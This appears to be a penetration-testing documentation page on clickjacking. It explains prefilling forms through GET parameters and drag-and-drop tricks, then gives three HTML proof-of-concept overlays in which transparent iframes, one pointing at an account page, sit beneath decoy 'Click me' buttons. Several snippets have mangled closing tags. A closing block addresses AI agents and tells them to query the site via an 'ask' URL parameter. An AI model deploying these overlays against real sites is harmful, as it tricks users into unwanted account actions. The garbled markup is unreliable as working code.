# Clickjacking

Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)).

Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.

If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like your email or and specific password that you know), you can just ask him to **Drag\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).

```
<style>   iframe {       position:relative;       width: 500px;       height: 700px;       opacity: 0.1;       z-index: 2;   }   div {       position:absolute;       top:470px;       left:60px;       z-index: 1;   }style><div>Click mediv>
```

```
<style>   iframe {       position:relative;       width: 500px;       height: 500px;       opacity: 0.1;       z-index: 2;   }   .firstClick, .secondClick {       position:absolute;       top:330px;       left:60px;       z-index: 1;   }   .secondClick {       left:210px;   }style><div class="firstClick">Click me firstdiv><div class="secondClick">Click me nextdiv><iframe src="https://vulnerable.net/account">iframe>
```

```
<html><head><style>#payload{position: absolute;top: 20px;}iframe{width: 1000px;height: 675px;border: none;}.xss{position: fixed;background: #F00;}style>head><body><div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.div><div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete buttondiv><div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click mediv>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pwc-3.gitbook.io/pwc/ji-shu/webpentest2/untitled-1-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.